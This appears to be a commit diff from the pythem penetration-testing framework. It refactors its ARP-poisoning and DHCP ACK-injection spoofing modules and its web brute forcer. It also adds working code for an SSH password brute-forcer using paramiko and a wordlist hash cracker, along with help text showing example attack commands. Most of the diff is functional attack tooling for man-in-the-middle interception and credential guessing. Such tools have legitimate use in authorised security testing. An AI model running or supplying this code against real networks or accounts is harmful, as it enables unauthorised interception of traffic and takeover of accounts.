m4n3dw0lf · m4n3dw0lf · Oct 17, 2018 · Oct 21, 2018 · Nov 5, 2018 · Nov 20, 2018
diff --git a/README.md b/README.md
@@ -72,8 +72,16 @@ $ sudo pythem
 
 - Requires Docker
 
+Stable:
+
+```
+docker run -it --net=host --rm --name pythem m4n3dw0lf/pythem:latest
+```
+
+Pythem-dev:
+
 ```
-docker run -it --net=host --rm --name pythem m4n3dw0lf/pythem
+docker run -it --net=host --rm --name pythem m4n3dw0lf/pythem:pythem-dev
 ```
 
 <br><br>

diff --git a/pythem/core/interface.py b/pythem/core/interface.py
diff --git a/pythem/modules/arpoisoner.py b/pythem/modules/arpoisoner.py
@@ -29,10 +29,16 @@
 class ARPspoof(object):
     name = "ARP poisoner spoofer"
     desc = "Use arp spoofing in order to realize a man-in-the-middle attack"
-    version = "0.5"
+    version = "0.6"
 
-    def __init__(self, gateway, targets, interface, myip, mymac):
+    def __init__(self):
+        self.gateway = None
+        self.targets = None
+        self.interface = None
+        self.myip = None
+        self.mymac = None
 
+    def start(self, gateway, targets, interface, myip, mymac):
         try:
             self.gateway = str(IPAddress(gateway))
         except AddrFormatError as e:
@@ -49,8 +55,6 @@ def __init__(self, gateway, targets, interface, myip, mymac):
         self.mymac = mymac
         self.socket = conf.L3socket(iface=self.interface)
         self.socket2 = conf.L2socket(iface=self.interface)
-
-    def start(self):
         t = threading.Thread(name='ARPspoof', target=self.spoof)
         t.setDaemon(True)
         t.start()
@@ -86,7 +90,7 @@ def get_range(self, targets):
     def resolve_mac(self, targetip):
         try:
             conf.verb = 0
-            ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op="who-has", pdst=targetip), timeout=2)
+            ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op="who-has", pdst=targetip), timeout=2, iface=self.interface)
             for snd, rcv in ans:
                 return str(rcv[Ether].src)
         except socket.gaierror:
@@ -177,3 +181,17 @@ def stop(self):
             self.socket.close()
             self.socket2.close()
             return
+
+
+arpoisoner_help = """\n
+[Help] Start an ARP spoofing attack.
+parameters:
+ - start
+ - stop
+ - status
+ - help
+example:
+pythem> set interface eth0
+pythem> set gateway 192.168.0.1
+pythem> arpspoof start
+\n"""
diff --git a/pythem/modules/web_bruter.py → pythem/modules/bruteforcer.py b/pythem/modules/web_bruter.py → pythem/modules/bruteforcer.py
@@ -19,31 +19,71 @@
 # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
 # USA
 
+
+from hashlib import *
+from sys import argv
+import os
+import paramiko
+import sys
+import socket
+from os import R_OK
 import urllib2
 import Queue
 import urllib
-import sys
-import os
 import mechanize
 
+class HashCracker(object):
+
+    def __init__(self):
+        self.hash = None
+        self.wordlist = None
+        self.type = None
+
+    def hashcrack(self, hash=None, wordlist=None):
+        if not hash:
+            self.hash = raw_input("[+] Enter the Hash: ")
+        else:
+            self.hash = hash
+
+        if not wordlist:
+            wordlist = raw_input("[+] Select file as wordlist: ")
+
+        self.wordlist = open(wordlist).readlines()
+        hash_type = {32: "md5", 40: "sha1", 56: "sha224", 64: "sha256", 128: "sha512"}
+        if not self.type:
+            print "[+] Supported Hashes: md5, sha1, sha224, sha256, sha512"
+            try:
+                print "[+] Most likely: {}".format(hash_type[len(self.hash)])
+            except:
+                pass
+            self.type = raw_input("[+] Hash Type: ")
+
+        hash_mapping = {
+                        "md5":md5, "sha1":sha1, "sha224":sha224, 
+                        "sha256":sha256, "sha512":sha512
+                       }
+        if self.type not in hash_mapping.keys():
+            return "[-] Hash type not supported."
+
+        try:
+            for word in self.wordlist:
+                if hash_mapping[self.type](word).hexdigest() == self.hash:
+                    return "[+] {} Cracked: {}".format(self.type.upper(), word)
+            return "[-] Hash not cracked, try another wordlist."
+        except Exception as e:
+            print "[!] Exception caught: {}".format(e)
+
 
 class WEBbrutus(object):
     name = "WEB brute forcer"
     desc = "Perform web password and directory brute-force"
     version = "0.3"
 
-    def __init__(self, target, file):
-        self.threads = 5
-        self.target_url = target
-        self.wordlist = file
-        self.resume = None
-        self.user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefor/19.0"
-        self.word_queue = self.build_wordlist(self.wordlist)
-        self.extensions = [".txt", ".php", ".bak", ".orig", ".inc", ".doc"]
-        self.line = "\n------------------------------------------------------------------------\n"
+    def __init__(self):
+        self.target_url = None
+        self.wordlist = None
 
     def build_wordlist(self, wordlist):
-        # Le a lista de palavras
         wordlist = self.wordlist
         fd = open(self.wordlist, "rb")
         raw_words = fd.readlines()
@@ -124,7 +164,15 @@ def dir_bruter(self, word_queue, extensions=None):
             except KeyboardInterrupt:
                 break
 
-    def start(self, mode):
+    def start(self, mode, target, file):
+        self.target_url = target
+        self.wordlist = file
+        self.threads = 5
+        self.resume = None
+        self.user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefor/19.0"
+        self.word_queue = self.build_wordlist(self.wordlist)
+        self.extensions = [".txt", ".php", ".bak", ".orig", ".inc", ".doc"]
+        self.line = "\n------------------------------------------------------------------------\n"
         if mode == 'url':
             print "[+] Content URL bruter initialized."
             try:
@@ -151,3 +199,123 @@ def stop(self, mode):
                 print "[-] Brute-Form authentication finalized."
             except Exception as e:
                 print "[!] Exception caught: {}".format(e)
+
+
+
+class SSHbrutus(object):
+    """SSH brute force class. """
+    name = "SSH Brute-forcer"
+    desc = "Perform password brute-force on SSH"
+    version = "0.1"
+
+    def __init__(self):
+        self.trgt = None
+        self.usr = None
+        self.fobj = None
+        self.port = None
+
+    def exists(self):
+        """Tests if the file exists and if the executing user has read access
+        to the file. Returns file if both tests are passed. """
+        if not os.path.isfile(self.fobj):
+            print '[-] File not found: {0}'.format(self.fobj)
+            sys.exit(1)
+
+        if not os.access(self.fobj, R_OK):
+            print '[-] Denied read access: {0}'.format(self.fobj)
+            sys.exit(1)
+
+        if os.path.isfile(self.fobj) and os.access(self.fobj, R_OK):
+            return self.fobj
+
+    def ssh_connect(self, passwd, code=0):
+        """Connects to the SSH server, attempts to authenticate and returns the
+        exit code from the attempt. """
+        ssh = paramiko.SSHClient()
+        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+        try:
+            ssh.connect(self.trgt, port=self.port, username=self.usr, password=passwd, timeout=2)
+        except paramiko.AuthenticationException:
+            code = 1
+        except socket.error, err:
+            code = 2, err
+
+        ssh.close()
+        return code
+
+    def start(self, trgt, usr, fobj, port):
+        self.trgt = trgt
+        self.usr = usr
+        self.fobj = fobj
+        self.port = port
+        """Itterates trough the password list and checks wheter or not the
+        correct password has been found. """
+        wlist = open(self.fobj)
+
+        for i in wlist.readlines():
+            passwd = i.strip("\n")
+            resp = self.ssh_connect(passwd)
+
+            if type(resp) == int:
+
+                if resp == 0:
+                    print "[+] User: {0}".format(self.usr)
+                    print "[+] Password found!: {0}".format(passwd)
+                    break
+
+                if resp == 1:
+                    print "[-] User: {0} Password: {1}".format(self.usr, passwd)
+
+            elif resp[0] == 2:
+                print "[!] {0}: {1}".format(resp[1], self.trgt)
+                break
+        wlist.close()
+
+brute_help = """\n
+[Help] Brute-Force attacks, good luck padawan.
+[Required] File as password wordlist and target as URL or IP.
+parameters:
+ - ssh
+ - form
+ - url
+ - hash
+example:
+pythem> brute ssh help
+\n"""
+
+brute_ssh_help = """\n
+[Help] SSH Brute-Force
+[Required] IP address as target.
+example:
+pythem> set file wordlist.txt
+pythem> set target 192.168.1.5
+pythem> brute ssh
+\n"""
+
+brute_form_help = """\n
+[Help] Formulary Brute-Force
+[Required] URL (with http:// or https://) as target
+example:
+pythem> set file wordlist.txt
+pythem> set target http://testphp.vulnweb.com/login.php
+pythem> brute form
+\n"""
+
+brute_url_help = """\n
+[Help] URL Brute-Force
+[Required] URL (with http:// or https://) as target
+example:
+pythem> set file wordlist.txt
+pythem> set target http://testphp.vulnweb.com/products.php?id=
+pythem> brute url
+\n"""
+
+brute_hash_help = """\n
+[Help] Hash Brute-Force
+[Optional]File as wordlist, hash as target.
+example:
+pythem> set file wordlist.txt
+pythem> set target 35f5de5eb59e2ac7f73d5821f9f2e4f6
+pythem> brute hash
+\n"""
diff --git a/pythem/modules/dhcpoisoner.py b/pythem/modules/dhcpoisoner.py
@@ -27,11 +27,10 @@
 class DHCPspoof(object):
     name = "DHCP Spoofing"
     desc = "DHCP ACK injection with DHCP Request monitor callback"
-    version = "0.1"
+    version = "0.2"
 
-    def __init__(self, mode):
-        if mode == "test":
-            return
+
+    def start(self, mode):
         try:
             self.dhcp_server_ip = raw_input("[+] DHCP Server IP address: ")
             self.lease = 43200  # input("[+] Lease time: ")
@@ -46,7 +45,6 @@ def __init__(self, mode):
             print "[!] Exception caught: {}".format(e)
         except KeyboardInterrupt:
             exit(0)
-
         if mode == "silent":
             t = threading.Thread(name="DHCPspoof", target=self.spoof)
             t.setDaemon(True)
@@ -108,6 +106,17 @@ def callback(self, p):
                     print "[!] Exception at try at line 110: {}".format(e)
                     pass
 
+dhcpoisoner_help = """\n
+[Help] Start a DHCP ACK Injection spoofing attack.
+parameters:
+ - start
+ - stop
+ - status
+ - help
+example:
+pythem> dhcpspoof start
+\n"""
+
 
 if __name__ == "__main__":
     try: